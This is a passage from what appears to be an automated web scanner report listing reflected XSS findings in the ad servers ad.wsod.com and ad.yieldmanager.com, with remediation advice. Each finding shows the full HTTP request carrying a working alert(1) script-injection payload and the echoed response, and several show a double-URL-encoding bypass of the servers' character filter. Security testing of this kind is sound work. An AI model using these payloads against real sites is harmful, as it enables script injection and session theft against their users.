<a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a6313578332a"><script>alert(1)</script>8cdd98fbef0/475.0.iframe.200x33/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.57. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207272** [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207272**

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26807%2522%253balert%25281%2529%252f%252fce3e2d56175 was submitted in the REST URL parameter 2. This input was echoed as 26807";alert(1)//ce3e2d56175 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a63135726807%2522%253balert%25281%2529%252f%252fce3e2d56175/475.0.iframe.200x33/1290207272** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1881

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a63135726807";alert(1)//ce3e2d56175/475.0.iframe.200x33/1290209586**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.58. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207272** [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207272**

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fd2f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e83dff2bd15c was submitted in the REST URL parameter 3. This input was echoed as 3fd2f"><script>alert(1)</script>83dff2bd15c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x333fd2f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e83dff2bd15c/1290207272** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1926

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x333fd2f"><script>alert(1)</script>83dff2bd15c/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.59. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207272** [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207272**

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6313f%2522%253balert%25281%2529%252f%252f64bea35dc56 was submitted in the REST URL parameter 3. This input was echoed as 6313f";alert(1)//64bea35dc56 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x336313f%2522%253balert%25281%2529%252f%252f64bea35dc56/1290207272** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1881

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x336313f";alert(1)//64bea35dc56/1290209589**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.60. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207272** [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207272**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a88b6'-alert(1)-'00389b2718a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207272**;10,1,102,64;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2F?click=http://global.ard.yahoo.com/SIG=15joe3ap7/M=757168.14056065.13990780.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1290214464/L=9h66cdG_R1f9SQS9TNcPQwJErnoX2kznACAADboO/B=xuwFAkJe5hI-/J=1290207264971902/K=k3t4Xnp2Coq5QY5G3IYSoA/A=5956662/R=0/*&a88b6'-alert(1)-'00389b2718a=1 HTTP/1.1
Accept: */*
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902?click=http://global.ard.yahoo.com/SIG=15joe3ap7/M=757168.14056065.13990780.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1290214464/L=9h66cdG_R1f9SQS9TNcPQwJErnoX2kznACAADboO/B=xuwFAkJe5hI-/J=1290207264971902/K=k3t4Xnp2Coq5QY5G3IYSoA/A=5956662/R=0/*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.wsod.com
Proxy-Connection: Keep-Alive
Cookie: fp=184372:eq:2:CS:10:3:1289925656:1:46; u=4cdc67692496d; i_1=46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L|19:318:494:29:0:32731:1290036045:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:35:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4cdc67692496d; expires=Sun, 19-Dec-2010 23:35:16 GMT; path=/
Set-Cookie: i_1=46:475:692:44:0:32947:1290209716:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; expires=Sun, 19-Dec-2010 23:35:16 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 734

   function wsod_image() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15joe3ap7/M=757168.14056065.13990780.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1290214464/L=9h66cdG_R1f9SQS9TNcPQwJErnoX2kznACAADboO/B=xuwFAkJe5hI-/J=1290207264971902/K=k3t4Xnp2Coq5QY5G3IYSoA/A=5956662/R=0/*&a88b6'-alert(1)-'00389b2718a=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/475.692.iframe.200x33/**;10.1102;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2F" target="_blank" title="Online $7 Trades! Click to find out mo
...[SNIP]...

2.61. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9071"-alert(1)-"47372ef7d14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?anmember=316&anprice=30&ad_type=ad&ad_size=300x250&section=1532283&c9071"-alert(1)-"47372ef7d14=1 HTTP/1.1
Accept: */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.yieldmanager.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: BX=fqi84nl6de3q3&b=4&s=9s&t=322; uid=uid=689ad102-f426-11df-b990-003048d7035a&_hmacv=1&_salt=1708372009&_keyid=k1&_hmac=49fc8d8d0d2a456164de1e4f68d5504628b44692; ih="b!!!!Q!'LK4!!!!#<b,bH!(45o!!!!#<b*d`!(4r^!!!!$<b*A]!(4wv!!!!$<b)H$!)B[>!!!!$<b)J1!,-Jd!!!!$<apWx!,-g`!!!!#<b)L:!,/dG!!!!#<b)3o!,5Ea!!!!'<apF)!,@lO!!!!#<aoke!,@lR!!!!#<aokl!,_%Y!!!!#<b)=G!,g_7!!!!$<b+6'!,m=A!!!!#<b*d^!-Go'!!!!$<b+[0!-O+V!!!!#<b*Vq!-gH!!!!!#<b)6%!-m8S!!!!$<b+L<!-s%T!!!!$<b*qG!-tN8!!!!#<b*?O!-v-.!!!!#<apWb!.$Cj!!!!#<b)ff!.$Cl!!!!#<b*fg!.(nY!!!!$<b)fg!.,Il!!!!#<b*fg!.0E^!!!!#<apPx!.=Rq!!!!#<b+/[!.I]0!!!!%<b*J0!.Nam!!!!#<apWy!.T*s!!!!#<apWi!.T3-!!!!#<b):<!.W)`!!!!'<apNl!.W1W!!!!$<b)+D!.XPH!!!!#<b*Cf!.Xc.!!!!#<apG4!._aZ!!!!#<ay>R!.`:h!!!!$<b+H#!.`<0!!!!#<b*Y$!.aP%!!!!#<b*-O!.dFU!!!!#<b*yp!.k$1!!!!$<b+`D!.rxQ!!!!#<apU9!/$oc!!!!#<aokk!/%8c!!!!#<apF/!/'PK!!!!$<b+)<"; pv1="b!!!!Y!#8>=!-I0R!$Khv!-O+V!$hh'!%lRJ!?5%!#<DN(!wVd.!%l4g!#^3*!%b`:~~~~~<b*Vq~~!#8>>!-I0R!$Khv!-O+V!$hh'!%lRJ!?5%!#<DN(!wVd.!%l4g!#^3*!%b`:~~~~~<b*Vq~~!#8>?!-I0R!$Khv!-O+V!$hh'!%lRJ!?5%!#<DN(!wVd.!%l4g!#^3*!%b`:~~~~~<b*Vq~~!#8>A!-I0R!$Khv!-O+V!$hh'!%lRJ!?5%!#<DN(!wVd.!%l4g!#^3*!%b`:~~~~~<b*Vq~~!#8>B!-I0R!$Khv!-O+V!$hh'!%lRJ!?5%!#<DN(!wVd.!%l4g!#^3*!%b`:~~~~~<b*Vq~~!#8>C!-I0R!$Khv!-O+V!$hh'!%lRJ!?5%!#<DN(!wVd.!%l4g!#^3*!%b`:~~~~~<b*Vq~~!#8>F!-I0R!$Khv!-O+V!$hh'!%lRJ!?5%!#<DN(!wVd.!%l4g!#^3*!%b`:~~~~~<b*Vq~~!#8>G!-I0R!$Khv!-O+V!$hh'!%lRJ!?5%!#<DN(!wVd.!%l4g!#^3*!%b`:~~~~~<b*Vq~~!#8>H!-I0R!$Khv!-O+V!$hh'!%lRJ!?5%!#<DN(!wVd.!%l4g!#^3*!%b`:~~~~~<b*Vq~~!#8>J!-I0R!$Khv!-O+V!$hh'!%lRJ!?5%!#<DN(!wVd.!%l4g!#^3*!%b`:~~~~~<b*Vq~~!#8>L!-I0R!$Khv!-O+V!$hh'!%lRJ!?5%!#<DN(!wVd.!%l4g!#^3*!%b`:~~~~~<b*Vq~~!#8>M!-I0R!$Khv!-O+V!$hh'!%lRJ!?5%!#<DN(!wVd.!%l4g!#^3*!%b`:~~~~~<b*Vq~~!#8>O!-I0R!$Khv!-O+V!$hh'!%lRJ!?5%!#<DN(!wVd.!%l4g!#^3*!%b`:~~~~~<b*Vq~~!#8>P!-I0R!$Khv!-O+V!$hh'!%lRJ!?5%!#<DN(!wVd.!%l4g!#^3*!%b`:~~~~~<b*Vq~~!#8>Q!-I0R!$Khv!-O+V!$hh'!%lRJ!?5%!#<DN(!wVd.!%l4g!#^3*!%b`:~~~~~<b*Vq~~!#8>R!-I0R!$Khv!-O+V!$hh'!%lRJ!?5%!#<DN(!wVd.!%l4g!#^3*!%b`:~~~~~<b*Vq~~!#8>S!-I0R!$Khv!-O+V!$hh'!%lRJ!?5%!#<DN(!wVd.!%l4g!#^3*!%b`:~~~~~<b*Vq~~!#8>U!-I0R!$Khv!-O+V!$hh'!%lRJ!?5%!#<DN(!wVd.!%l4g!#^3*!%b`:~~~~~<b*Vq~~!#8>Y!-I0R!$Khv!-O+V!$hh'!%lRJ!?5%!#<DN(!wVd.!%l4g!#^3*!%b`:~~~~~<b*Vq~~!#Mli!-I0R!#B5*!.`:h!%!tJ!+,Cq!!vZ,#t#a+!w1K*!$cTX!$b[!!%xl+~~~~~<b+H#<b,s)!!!#G!#Mlj!-I0R!#B5*!.`:h!%!tJ!+,Cq!!vZ,#t#a+!w1K*!$cTX!$b[!!%xl+~~~~~<b+H#<b.G.!!!#G!#Mlk!-I0R!#B5*!.`:h!%!tJ!+,Cq!!vZ,#t#a+!w1K*!$cTX!$b[!!%xl+~~~~~<b+H#<b1F8!!!#G!#Mll!-I0R!#B5*!.`:h!%!tJ!+,Cq!!vZ,#t#a+!w1K*!$cTX!$b[!!%xl+~~~~~<b+H#<b7DM!!!#G!!qW]!-I0R!$Khv!,m=A!$u!,!'`,R!?5%!#<DN(![:Z-!%l4g!%p5>~~~~~~<b*d^<c)Jw!!!([!!3L[!-I0R!$N)n!(45o!$tyM!(-EV!?5%!#<DN(!ZmB)!%oLn!%f(C~~~~~~<b*d`<jQ8t!!!([!#7km!-I0R!#6`[!.dFU!%$3p!)kPg!?5%!#W`W)!wVd.!$7>N!#SxE!'!?q~~~~~<b*yp<bCrk!!!#G!#]L>!+*L?!!bb>!/'PK!%*AE!$xxB!?5%!#W`W)!x$$2!%O'B!%pB(!')`p~~~~~<b+)<~~!#]LA!+*L?!!bb>!/'PK!%*AE!$xxB!?5%!#W`W)!x$$2!%O'B!%pB(!')`p~~~~~<b+)<~M.jTN!#]LC!+*L?!!bb>!/'PK!%*AE!$xxB!?5%!#W`W)!x$$2!%O'B!%pB(!')`p~~~~~<b+)<~M.jTN!#bv(!+*L?!!bb>!/'PK!%*AE!$xxB!?5%!#W`W)!x$$2!%O'B!%pB(!')`p~~~~~<b+)<~M.jTN!#P98!+*L?!!bb>!,g_7!$Y5L!%lRJ!?5%!#W`W)!x$$2!%O'B!%NTC!%NT+~~~~~<b+6'~M.jTN!#P9D!+*L?!!bb>!,g_7!$Y5L!%lRJ!?5%!#W`W)!x$$2!%O'B!%NTC!%NT+~~~~~<b+6'~M.jTN!#U]o!+*L?!!bb>!,g_7!$Y5L!%lRJ!?5%!#W`W)!x$$2!%O'B!%NTC!%NT+~~~~~<b+6'~~!#V=D!+*L?!!bb>!,g_7!$Y5L!%lRJ!?5%!#W`W)!x$$2!%O'B!%NTC!%NT+~~~~~<b+6'~!'5e-!#/e8!-I0R!#B5*!.`:h!%!tJ!+,Cq!!vZ,#t#a+!w1K*!$cTX!$b[!!%xl+~~~~~<b+H#<bD@v!!:ru!#/e<!-I0R!#B5*!.`:h!%!tJ!+,Cq!!vZ,#t#a+!w1K*!$cTX!$b[!!%xl+~~~~~<b+H#<bD@v!!!#G!#/e@!-I0R!#B5*!.`:h!%!tJ!+,Cq!!vZ,#t#a+!w1K*!$cTX!$b[!!%xl+~~~~~<b+H#<bD@v!!!#G!#/eD!-I0R!#B5*!.`:h!%!tJ!+,Cq!!vZ,#t#a+!w1K*!$cTX!$b[!!%xl+~~~~~<b+H#<bD@v!!!#G!#/eN!-I0R!#B5*!.`:h!%!tJ!+,Cq!!vZ,#t#a+!w1K*!$cTX!$b[!!%xl+~~~~~<b+H#<bD@v!!!#G!#/eR!-I0R!#B5*!.`:h!%!tJ!+,Cq!!vZ,#t#a+!w1K*!$cTX!$b[!!%xl+~~~~~<b+H#<bD@v!!!#G!#2G4!-I0R!#B5*!.`:h!%!tJ!+,Cq!!vZ,#t#a+!w1K*!$cTX!$b[!!%xl+~~~~~<b+H#<bD@v!!!#G!#C(W!-I0R!#B5*!.`:h!%!tJ!+,Cq!!vZ,#t#a+!w1K*!$cTX!$b[!!%xl+~~~~~<b+H#<bD@v!!!#G!#E8B!-I0R!#B5*!.`:h!%!tJ!+,Cq!!vZ,#t#a+!w1K*!$cTX!$b[!!%xl+~~~~~<b+H#<bD@v!!!#G!#Mlh!-I0R!#B5*!.`:h!%!tJ!+,Cq!!vZ,#t#a+!w1K*!$cTX!$b[!!%xl+~~~~~<b+H#<b+sC!!!#G!#Mlm!-I0R!#B5*!.`:h!%!tJ!+,Cq!!vZ,#t#a+!w1K*!$cTX!$b[!!%xl+~~~~~<b+H#<bP=H!!!#G!#Mln!-I0R!#B5*!.`:h!%!tJ!+,Cq!!vZ,#t#a+!w1K*!$cTX!$b[!!%xl+~~~~~<b+H#<c*.>!!!#G!#V<O!-I0R!#B5*!.`:h!%!tJ!+,Cq!!vZ,#t#a+!w1K*!$cTX!$b[!!%xl+~~~~~<b+H#<bD@v!!!#G!#WQo!-I0R!#B5*!.`:h!%!tJ!+,Cq!!vZ,#t#a+!w1K*!$cTX!$b[!!%xl+~~~~~<b+H#<bD@v!!!#G!#UL.!+*L?!!bb>!-Go'!$f>j!(R^Z!?5%!#t#a*!x$$2!%O'B!%>Uf!%_cG~~~~~<b+[0~!!.vL!#UL/!+*L?!!bb>!-Go'!$f>j!(R^Z!?5%!#t#a*!x$$2!%O'B!%>Uf!%_cG~~~~~<b+[0~M.jTN!#UL0!+*L?!!bb>!-Go'!$f>j!(R^Z!?5%!#t#a*!x$$2!%O'B!%>Uf!%_cG~~~~~<b+[0~M.jTN!#UL>!+*L?!!bb>!-Go'!$f>j!(R^Z!?5%!#t#a*!x$$2!%O'B!%>Uf!%_cG~~~~~<b+[0~!!xa=!#UOB!+*L?!!bb>!-Go'!$f>j!(R^Z!?5%!#t#a*!x$$2!%O'B!%>Uf!%_cG~~~~~<b+[0~!!xa="; bh="b!!!$q!!!?H!!!!$<b*d_!!#s8!!!!$<b)ff!!-C)!!!!#<apD8!!..X!!!!#<apWV!!/9n!!!!'<b*d_!!/Ju!!!!(<b*d_!!/Jw!!!!(<b*d_!!0+@!!!!#<apWF!!04a!!!!#<apWx!!06^!!!!#<apNi!!06m!!!!#<apNi!!06q!!!!#<apNi!!06t!!!!#<apNi!!07P!!!!#<apNi!!07a!!!!#<apNi!!07l!!!!#<apNi!!08B!!!!#<apNi!!08H!!!!#<apNi!!08d!!!!#<apNi!!08i!!!!#<apNi!!08m!!!!#<apNi!!2R$!!!!#<apF5!!346!!!!#<apG(!!3DH!!!!#<apNi!!3E>!!!!#<apNi!!4F0!!!!(<b*d_!!4d6!!!!#<ap?r!!:*A!!!!#<apD<!!<%4!!!!#<apD8!!<%5!!!!#<apD8!!<@s!!!!#<apD8!!VQ+!!!!#<apEG!!Zwa!!!!$<b)3q!!bu:!!!!G<b,`:!!ita!!!!(<b*d_!!jD(!!!!G<b,`:!!jD*!!!!G<b,`:!!jD>!!!!G<b,`:!!mEw!!!!G<b,`:!!qJw!!!!G<b,`:!!tGm!!!!#<b,g7!!ti>!!!!#<apF$!!tw.!!!!G<b,`:!!tw:!!!!G<b,`:!!u)F!!!!G<b,`:!!uZR!!!!.<b,`:!!u^D!!!!#<aqDt!!vOD!!!!%<b)ff!!vOF!!!!%<b)ff!!vq<!!!!#<apNi!!w/#!!!!#<apNi!!w/I!!!!#<apNi!!w/R!!!!#<apNi!!we_!!!!G<b,`:!!y>@!!!!G<b,`:!!yaE!!!!G<b,`:!#!ID!!!!G<b,`:!#!NM!!!!#<b,g7!#!vK!!!!#<b,g7!#'7A!!!!G<b,`:!#*bg!!!!#<b,g!!#.dO!!!!G<b,`:!#/j5!!!!#<b,g$!#/j:!!!!#<b,g$!#/j>!!!!#<b,g$!#1%d!!!!$<b)3q!#1bq!!!!.<b,`:!#2RT!!!!#<b,g!!#2Y*!!!!#<b,g!!#3*A!!!!G<b,`:!#34G!!!!G<b,`:!#3H!!!!!G<b,`:!#3L3!!!!#<b,g!!#5+B!!!!#<b,g$!#6c%!!!!G<b,`:!#7rS!!!!#<b*yp!#8-G!!!!%<b)ff!#8-H!!!!%<b)ff!#8-I!!!!%<b)ff!#8-J!!!!%<b)ff!#8-K!!!!%<b)ff!#84U!!!!#<aqDs!#9ny!!!!#<apD,!#9qA!!!!G<b,`:!#9rw!!!!G<b,`:!#:<w!!!!#<b,g!!#@wb!!!!#<b,g$!#D%d!!!!#<b,g!!#EQ9!!!!#<b,g$!#F..!!!!#<b,g7!#GsG!!!!G<b,`:!#JqU!!!!#<b,g7!#Js*!!!!G<b,`:!#Kxq!!!!#<b,g$!#MTC!!!!(<b*d_!#MTF!!!!%<b)ff!#MTH!!!!(<b*d_!#MTI!!!!(<b*d_!#MTJ!!!!(<b*d_!#Ms5!!!!#<b,g!!#Mts!!!!#<b,g!!#N15!!!!#<b,g$!#N4R!!!!#<apS,!#O29!!!!$<b)3q!#O4F!!!!#<b,g$!#OH-!!!!#<b,g$!#P)=!!!!#<b,g$!#P>4!!!!G<b,`:!#Q*6!!!!G<b,`:!#Q+*!!!!#<b+ym!#Q+/!!!!G<b,`:!#Q+<!!!!%<b,Vh!#Q+I!!!!$<b+L9!#Q+^!!!!G<b,`:!#Q+o!!!!.<b,`:!#Q+p!!!!G<b,`:!#Q,.!!!!0<b+6$!#Q-%!!!!G<b,`:!#Q-7!!!!G<b,`:!#Q-A!!!!G<b,`:!#Q-d!!!!G<b,`:!#Q.@!!!!G<b,`:!#QMh!!!!%<b)ff!#R%b!!!!$<b)3q!#R%c!!!!$<b)3q!#RY.!!!!G<b,`:!#R]*!!!!#<b,g7!#Ri/!!!!G<b,`:!#Rij!!!!G<b,`:!#SCj!!!!+<b,`<!#SCk!!!!%<b*fi!#SFH!!!!%<b)ff!#SFJ!!!!%<b)ff!#SFM!!!!%<b)ff!#Snj!!!!#<b,g7!#Su2!!!!%<b)ff!#Su3!!!!%<b)ff!#Su4!!!!%<b)ff!#Tnr!!!!#<b,g!!#Tun!!!!#<b,g7!#Tuq!!!!#<b,g7!#UJ4!!!!#<b,g$!#UJ>!!!!#<b,g$!#UUc!!!!#<b,g$!#UUf!!!!#<b,g!!#UY_!!!!$<b)3q!#UYf!!!!$<b)3q!#UYg!!!!$<b)3q!#UYl!!!!$<b)3q!#UYn!!!!$<b)3q!#UZ(!!!!$<b)3q!#UZ)!!!!$<b)3q!#V6S!!!!#<b,g!!#V9d!!!!#<b,g$!#VG`!!!!#<b,g!!#VMs!!!!$<b)3q!#VMw!!!!$<b)3q!#VMx!!!!$<b)3q!#VN!!!!!$<b)3q!#VN#!!!!$<b)3q!#VN$!!!!$<b)3q!#VN%!!!!$<b)3q!#VN'!!!!$<b)3q!#VN(!!!!$<b)3q!#VN-!!!!$<b)3q!#VN.!!!!$<b)3q!#VN/!!!!$<b)3q!#VN1!!!!$<b)3q!#VN2!!!!$<b)3q!#W`,!!!!#<apY3!#Wa9!!!!#<b,g!!#Wa=!!!!#<b,g!!#XA!!!!!G<b,`:!#X]+!!!!G<b,`:!#X]l!!!!G<b,`:!#X^1!!!!#<b,g$!#Xa9!!!!%<b)ff!#Xa:!!!!%<b)ff!#XaK!!!!G<b,`:!#ZAw!!!!#<apWb!#ZBw!!!!G<b,`:!#Z]J!!!!#<b)6%!#Zj[!!!!$<b)3q!#Zj]!!!!$<b)3q!#Zj^!!!!$<b)3q!#Zj_!!!!$<b)3q!#Zj`!!!!$<b)3q!#Zjb!!!!$<b)3q!#Zjc!!!!$<b)3q!#Zmf!!!!)<b,dJ!#Znh!!!!#<b,g$!#[5H!!!!#<b,g7!#[7l!!!!G<b,`:!#[sS!!!!G<b,`:!#],2!!!!'<b*d_!#],3!!!!'<b*d_!#],4!!!!'<b*d_!#],5!!!!'<b*d_!#],6!!!!'<b*d_!#],7!!!!'<b*d_!#],9!!!!'<b*d_!#],:!!!!'<b*d_!#],<!!!!'<b*d_!#],>!!!!'<b*d_!#],?!!!!'<b*d_!#],@!!!!'<b*d_!#],A!!!!'<b*d_!#]BL!!!!'<b*d_!#]BM!!!!'<b*d_!#]NL!!!!#<b,g!!#]W%!!!!G<b,`:!#]Z!!!!!$<b)3q!#]wA!!!!#<ap?t!#]wJ!!!!$<b)ff!#]wW!!!!#<ap?t!#^#O!!!!#<b,g!!#^$-!!!!(<b*d_!#^Bo!!!!G<b,`:!#_.<!!!!$<b)3q!#_0t!!!!#<b#/T!#`-[!!!!(<b*d_!#`-d!!!!(<b*d_!#`-e!!!!(<b*d_!#`-f!!!!(<b*d_!#`-g!!!!(<b*d_!#`-i!!!!(<b*d_!#`-j!!!!(<b*d_!#a,x!!!!G<b,`:!#a3k!!!!G<b,`:!#a57!!!!G<b,`:!#aEJ!!!!$<b)3q!#aG>!!!!G<b,`:!#aGr!!!!%<b+H#!#a[w!!!!#<b*-O!#avB!!!!G<b,`:!#b//!!!!#<b,g!!#bn9!!!!$<b*-N!#c8V!!!!$<b)3q!#c8W!!!!$<b)3q!#c8X!!!!$<b)3q!#c8c!!!!$<b)3q!#c8g!!!!$<b)3q!#c8v!!!!$<b)3q!#c9A!!!!$<b)3q!#c9f!!!!$<b)3q!#dVK!!!!'<b*d_"; vuday1=wqsoi?:rWI%)0sMB3=NPNCsI8Wg:ss; lifb=+<wB+1@SpyAFC_u9NH!TE93w*@)6sfI>yV.1>!3aF8k'G09vv%EBG0rVatIsbI3A_; liday1=uSolsE8o@Km0+-/^Hxp2%P2k=/U(jkqt9@sNCsI875tOx; 